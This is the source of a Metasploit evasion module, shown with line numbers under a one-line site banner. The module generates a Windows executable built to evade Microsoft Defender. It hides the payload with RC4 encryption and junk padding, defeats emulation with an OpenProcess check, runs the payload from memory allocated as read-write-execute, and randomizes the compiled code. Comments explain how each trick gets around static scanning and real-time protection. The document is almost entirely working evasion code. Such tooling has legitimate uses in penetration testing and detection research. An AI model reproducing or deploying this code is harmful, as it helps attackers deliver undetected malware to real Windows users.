Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
require 'metasploit/framework/compiler/windows'
7

8
class MetasploitModule < Msf::Evasion
9

10
  def initialize(info={})
11
    super(merge_info(info,
12
      'Name'        => 'Microsoft Windows Defender Evasive Executable',
13
      'Description' => %q{
14
        This module allows you to generate a Windows EXE that evades against Microsoft
15
        Windows Defender. Multiple techniques such as shellcode encryption, source code
16
        obfuscation, Metasm, and anti-emulation are used to achieve this.
17

18
        For best results, please try to use payloads that use a more secure channel
19
        such as HTTPS or RC4 in order to avoid the payload network traffic getting
20
        caught by antivirus better.
21
      },
22
      'Author'      => [ 'sinn3r' ],
23
      'License'     => MSF_LICENSE,
24
      'Platform'    => 'win',
25
      'Arch'        => ARCH_X86,
26
      'Targets'     => [ ['Microsoft Windows', {}] ]
27
    ))
28
  end
29

30
  def rc4_key
31
    @rc4_key ||= Rex::Text.rand_text_alpha(32..64)
32
  end
33

34
  def get_payload
35
    @c_payload ||= lambda {
36
      opts = { format: 'rc4', key: rc4_key }
37
      junk = Rex::Text.rand_text(10..1024)
38
      p = payload.encoded + junk
39

40
      return {
41
        size: p.length,
42
        c_format: Msf::Simple::Buffer.transform(p, 'c', 'buf', opts)
43
      }
44
    }.call
45
  end
46

47
  def c_template
48
    @c_template ||= %Q|#include <Windows.h>
49
#include <rc4.h>
50

51
// The encrypted code allows us to get around static scanning
52
#{get_payload[:c_format]}
53

54
int main() {
55
  int lpBufSize = sizeof(int) * #{get_payload[:size]};
56
  LPVOID lpBuf = VirtualAlloc(NULL, lpBufSize, MEM_COMMIT, 0x00000040);
57
  memset(lpBuf, '\\0', lpBufSize);
58

59
  HANDLE proc = OpenProcess(0x1F0FFF, false, 4);
60
  // Checking NULL allows us to get around Real-time protection
61
  if (proc == NULL) {
62
    RC4("#{rc4_key}", buf, (char*) lpBuf, #{get_payload[:size]});
63
    void (*func)();
64
    func = (void (*)()) lpBuf;
65
    (void)(*func)();
66
  }
67

68
  return 0;
69
}|
70
  end
71

72
  def run
73
    vprint_line c_template
74
    # The randomized code allows us to generate a unique EXE
75
    bin = Metasploit::Framework::Compiler::Windows.compile_random_c(c_template)
76
    print_status("Compiled executable size: #{bin.length}")
77
    file_create(bin)
78
  end
79

80
end
81

82